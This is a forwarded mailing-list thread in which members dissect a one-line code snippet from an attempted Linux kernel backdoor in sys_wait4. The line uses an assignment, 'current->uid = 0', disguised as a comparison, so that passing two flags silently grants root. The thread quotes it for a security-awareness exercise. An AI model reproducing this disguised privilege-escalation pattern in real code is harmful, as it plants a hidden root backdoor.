Interesting message I got. Isn't that a demonstration of the *real* (no FUD) open source model security break points? It seems to me that unfortunately, theoretically, there could be many exploits of this vulnerability (or am I wrong here?).
Boaz.
*START READING FROM THE END!*
-----Original Message----- Subject: RE: What's wrong with this code?
All-
Thanks to everyone who responded. In all I received over ten responses and all of them were great. Everyone who responded found the 'bug' (I'll explain why bug is in quotes) in the code below which was:
'current->uid = 0' and should have been 'current->uid == 0'
Basically everyone noted that since there was a missing '=' the if-statement would always return false and therefore never execute 'retval = -EINVAL'. Some responses caught the deeper problem which was that instead of checking if 'current->uid' equals zero (a comparison) the code actually sets 'current->uid' equal to zero (an assignment) when flags _WCLONE and _WALL are set. This obviously is not a good thing - the user sets two flags and becomes uid 0 (i.e. root)!
So where did I get this code? Well, this code was recently found in the Linux kernel function 'sys_wait4'. No, it wasn't a coding mistake but rather an attempt to backdoor the Linux kernel. For more information see:
http://www.securityfocus.com/news/7388
Since I received so many responses I'm considering doing a challenge like this either once or twice a month; Call it "Spot the Vulnerability". I'd probably make the challenges a bit harder (more code) and ask people to identify the problem, how to fix it, and how to detect it in software engineering. Does the list thing it's a worthwhile idea?
-John Walton p.s. I made a similar mistake on my compilers program recently. It took me over two hours to find. Unfortunately, gcc doesn't warn on things like an assignment inside if-statements .
-----Original Message----- Subject: What's wrong with this code?
Folks-
Here is a little bit of a challenge for you. Take a look at the code below and find what is wrong with it and why:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;Note: "_WCLONE" and "_WALL" are flags you can pass the program. For those of you who have seen or heard about this already don't spoil it for everyone else .
-John Walton.
================================================================= To unsubscribe, send mail to [EMAIL PROTECTED] with the word "unsubscribe" in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
